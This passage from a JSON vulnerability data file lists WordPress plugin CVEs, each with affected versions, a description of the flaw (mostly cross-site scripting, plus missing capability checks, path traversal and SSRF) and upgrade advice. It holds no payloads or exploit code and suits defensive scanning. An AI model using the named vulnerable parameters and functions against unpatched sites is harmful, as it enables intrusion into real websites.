version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53871750-6437-459f-97e1-5cf524160f09?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/53871750-6437-459f-97e1-5cf524160f09?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184380%40futurio-extra&new=3184380%40futurio-extra&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3184380%40futurio-extra&new=3184380%40futurio-extra&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10127","slug":"pluscaptcha","versionImpact":"2.0.6","versionEndExcluding":"2.0.14","description":"A vulnerability was found in PlusCaptcha Plugin up to 2.0.6 on WordPress and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.0.14 is able to address this issue. The patch is identified as 1274afc635170daafd38306487b6bb8a01f78ecd. It is recommended to upgrade the affected component. VDB-248954 is the identifier assigned to this vulnerability.","recommendation":"Update to version 2.0.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.248954\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.248954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248954\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.248954\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/pluscaptcha\\\/commit\\\/1274afc635170daafd38306487b6bb8a01f78ecd\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/pluscaptcha\\\/commit\\\/1274afc635170daafd38306487b6bb8a01f78ecd\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3524","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.13.1","description":"The WPCode WordPress plugin before 2.0.13.1 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89570379-769b-4684-b8a7-28c37b408e5d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/89570379-769b-4684-b8a7-28c37b408e5d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8604","slug":"wp-table-builder","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The WP Table Builder \u2013 WordPress Table Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wptb shortcode in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/class-tables.php#L153\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-table-builder\\\/trunk\\\/inc\\\/admin\\\/class-tables.php#L153\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3341699%40wp-table-builder%2Ftrunk&old=3336979%40wp-table-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3341699%40wp-table-builder%2Ftrunk&old=3336979%40wp-table-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-table-builder\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac2f6549-016f-494d-99a4-52a1527f1fd2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ac2f6549-016f-494d-99a4-52a1527f1fd2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3607","slug":"propertyhive","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The PropertyHive plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_key_date() function in all versions up to, and including, 2.0.12. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8d52ced-807b-48c0-bb7a-e40d143ae5d3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8d52ced-807b-48c0-bb7a-e40d143ae5d3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3075163%40propertyhive&new=3075163%40propertyhive&sfp_email=&sfph_mail=#file11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3075163%40propertyhive&new=3075163%40propertyhive&sfp_email=&sfph_mail=#file11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10872","slug":"getwid","versionImpact":"2.0.12","versionEndExcluding":"2.0.13","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `template-post-custom-field` block in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae0030f-af21-43fb-959a-8da04cab05bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ae0030f-af21-43fb-959a-8da04cab05bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/templates\\\/template-parts\\\/post-custom-field.php#L9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/templates\\\/template-parts\\\/post-custom-field.php#L9\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188812#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188812#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9354","slug":"estatik-mortgage-calculator","versionImpact":"2.0.11","versionEndExcluding":"2.0.12","description":"The Estatik Mortgage Calculator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'color' parameter in all versions up to, and including, 2.0.11 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/estatik-mortgage-calculator\\\/trunk\\\/public\\\/images\\\/info.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/estatik-mortgage-calculator\\\/trunk\\\/public\\\/images\\\/info.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199224%40estatik-mortgage-calculator&new=3199224%40estatik-mortgage-calculator&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3199224%40estatik-mortgage-calculator&new=3199224%40estatik-mortgage-calculator&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b955a0f-d064-436f-8648-0e84fac752d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b955a0f-d064-436f-8648-0e84fac752d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8663","slug":"wp-simple-booking-calendar","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The WP Simple Booking Calendar plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cad4300f-02f9-4c9f-9bb3-1c9da8b78ac9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/base\\\/admin\\\/calendar\\\/views\\\/view-edit-calendar.php#L155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/base\\\/admin\\\/calendar\\\/views\\\/view-edit-calendar.php#L155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150474%40wp-simple-booking-calendar&new=3150474%40wp-simple-booking-calendar&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3150474%40wp-simple-booking-calendar&new=3150474%40wp-simple-booking-calendar&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-simple-booking-calendar\\\/tags\\\/2.0.10\\\/includes\\\/modules\\\/update-checker\\\/views\\\/view-register-website.php#L21\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6491","slug":"getwid","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mailchimp_api_key_manage function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the MailChimp API key.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb2be4cd-2641-4f7f-993c-1c78e5a1d5da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fb2be4cd-2641-4f7f-993c-1c78e5a1d5da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php#L190\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php#L190\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/mailchimp.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6489","slug":"getwid","versionImpact":"2.0.10","versionEndExcluding":"2.0.11","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the get_google_api_key function in all versions up to, and including, 2.0.10. This makes it possible for authenticated attackers, with Contributor-level access and above, to set the MailChimp API key.","recommendation":"Update to version 2.0.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe391ac9-e3ea-48b3-8ffe-243972ce89f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe391ac9-e3ea-48b3-8ffe-243972ce89f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/google-map.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3119180\\\/getwid\\\/trunk\\\/includes\\\/blocks\\\/google-map.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0236","slug":"tutor","versionEndExcluding":"2.0.10","description":"The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/503835db-426d-4b49-85f7-c9a20d6ff5b8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/503835db-426d-4b49-85f7-c9a20d6ff5b8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11357","slug":"goodlayers-core","versionImpact":"2.0.9","versionEndExcluding":"2.0.10","description":"The goodlayers-core WordPress plugin before 2.0.10 does not sanitise and escape some of its settings, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.0.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e8c6816-9b7a-43e8-9508-789c8051dd9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7e8c6816-9b7a-43e8-9508-789c8051dd9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10014","slug":"kau-boys-backend-localization","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"A vulnerability classified as problematic has been found in Kau-Boy Backend Localization Plugin 2.0 on WordPress. Affected is the function backend_localization_admin_settings\/backend_localization_save_setting\/backend_localization_login_form\/localize_backend of the file backend_localization.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 2.0.1 is able to address this issue. The name of the patch is 36f457ee16dd114e510fd91a3ea9fbb3c1f87184. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-227232.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0.1\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/releases\\\/tag\\\/2.0.1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/36f457ee16dd114e510fd91a3ea9fbb3c1f87184\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/kau-boys-backend-localization\\\/commit\\\/36f457ee16dd114e510fd91a3ea9fbb3c1f87184\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.227232\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.227232\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227232\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.227232\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1090","slug":"smtp-mailing-queue","versionEndExcluding":"2.0.1","description":"The SMTP Mailing Queue WordPress plugin before 2.0.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d470dd6c-dcac-4a3e-b42a-2489a31aca45\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d470dd6c-dcac-4a3e-b42a-2489a31aca45\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply.md\",\"name\":\"https:\\\/\\\/github.com\\\/youki992\\\/youki992.github.io\\\/blob\\\/master\\\/others\\\/apply.md\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12814","slug":"loan-comparison","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"The Loan Comparison plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'loancomparison' shortcode in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/loan-comparison\\\/tags\\\/2.0&new_path=\\\/loan-comparison\\\/tags\\\/2.0.1&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/loan-comparison\\\/tags\\\/2.0&new_path=\\\/loan-comparison\\\/tags\\\/2.0.1&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212274%40loan-comparison&new=3212274%40loan-comparison&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3212274%40loan-comparison&new=3212274%40loan-comparison&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9d000ad-a8f1-44c8-8c11-4a1982e1e6e4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9d000ad-a8f1-44c8-8c11-4a1982e1e6e4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13427","slug":"pagelayer","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially fixed in version 1.9.9 and completely fixed in version 2.0.1.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298138\\\/pagelayer\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298138\\\/pagelayer\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df2f3cc-affc-4549-b59e-d145cce10c79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5df2f3cc-affc-4549-b59e-d145cce10c79?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4223","slug":"pagelayer","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018login_url\u2019 parameter in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. A valid username\/password pair needs to be supplied in order to be successfully exploited and any injected scripts will only execute in the context of that authenticated user.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/2.0.0\\\/main\\\/ajax.php#L1415\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pagelayer\\\/tags\\\/2.0.0\\\/main\\\/ajax.php#L1415\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3298138%40pagelayer%2Ftrunk%2Fmain%2Fajax.php&old=3253356%40pagelayer%2Ftrunk%2Fmain%2Fajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=3298138%40pagelayer%2Ftrunk%2Fmain%2Fajax.php&old=3253356%40pagelayer%2Ftrunk%2Fmain%2Fajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6db6736-4629-47b7-976a-f81335430119?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b6db6736-4629-47b7-976a-f81335430119?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9935","slug":"pdf-generator-addon-for-elementor-page-builder","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The PDF Generator Addon for Elementor Page Builder plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.5 via the rtw_pgaepb_dwnld_pdf() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36daf2af-1db3-4b35-8849-480212660b2f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/36daf2af-1db3-4b35-8849-480212660b2f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-generator-addon-for-elementor-page-builder\\\/trunk\\\/public\\\/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/pdf-generator-addon-for-elementor-page-builder\\\/trunk\\\/public\\\/class-pdf-generator-addon-for-elementor-page-builder-public.php#L133\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6832","slug":"aio-time-clock-lite","versionImpact":"2.0","versionEndExcluding":"2.0.1","description":"The All in One Time Clock Lite \u2013 Tracking Employee Time Has Never Been Easier plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'nonce' parameter in all versions up to, and including, 2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336943%40aio-time-clock-lite&new=3336943%40aio-time-clock-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3336943%40aio-time-clock-lite&new=3336943%40aio-time-clock-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844b7471-3adf-45fd-9906-f0c817d6565c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/844b7471-3adf-45fd-9906-f0c817d6565c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11759","slug":"bukza","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The Bukza plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bukza' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207300%40bukza&new=3207300%40bukza&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3207300%40bukza&new=3207300%40bukza&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3e348b24-4c49-43ed-b4f3-b31f0f709830?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2605","slug":"wpbrutalai","versionEndExcluding":"2.0.1","description":"The wpbrutalai WordPress plugin before 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/372cb940-71ba-4d19-b35a-ab15f8c2fdeb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0889","slug":"tf-numbers-number-counter-animaton","versionEndExcluding":"2.0.1","description":"Themeflection Numbers WordPress plugin before 2.0.1 does not have authorisation and CSRF check in an AJAX action, and does not ensure that the options to be updated belong to the plugin. As a result, it could allow any authenticated users, such as subscriber, to update arbitrary blog options, such as enabling registration and set the default role to administrator","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c39473a7-47fc-4bce-99ad-28d03f41e74e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c39473a7-47fc-4bce-99ad-28d03f41e74e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8680","slug":"b-slider","versionImpact":"2.0.0","versionEndExcluding":"2.0.1","description":"The B Slider- Gutenberg Slider Block for WP plugin for WordPress is vulnerable to Server-Side Request Forgery in version less than, or equal to, 2.0.0 via the fs_api_request function. This makes it possible for authenticated attackers, with subscriber-level access and above to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","recommendation":"Update to version 2.0.1, or a newer patched 